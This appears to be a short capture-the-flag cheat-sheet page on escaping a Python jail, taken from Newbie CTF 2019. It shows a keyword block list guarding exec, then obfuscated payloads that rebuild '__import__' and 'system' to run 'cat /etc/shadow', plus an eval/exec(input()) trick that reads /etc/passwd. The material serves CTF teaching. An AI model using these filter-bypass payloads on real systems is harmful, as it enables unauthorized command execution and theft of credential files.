Page cover image

Python Jails Escape

If we faced the Python script as follow, we cannot use common modules used for escalating privileges ("os", "system", etc.). It appeared in Newbie CTF 2019.

#! /usr/bin/python3
def main():
    text = input('>> ')
    for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
        if keyword in text:
            print("No!!!")
            return
        else:
            exec(text)

if __name__ == "__main__":
    main()
Copied!

We need to modify module names to allow us to execute them. This post explains in details.

print(globals())
print(getattr(getattr(globals()['__builtins__'], '__im'+'port__')('o'+'s'), 'sys'+'tem')('cat /etc/shadow'))
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /etc/shadow')
Copied!

If the "eval" or "exec" modules are accepted, we can input arbitrary code.

eval(input())
# or
exec(input())

> print(open("/etc/passwd", "r").read())
Copied!

References

Last updated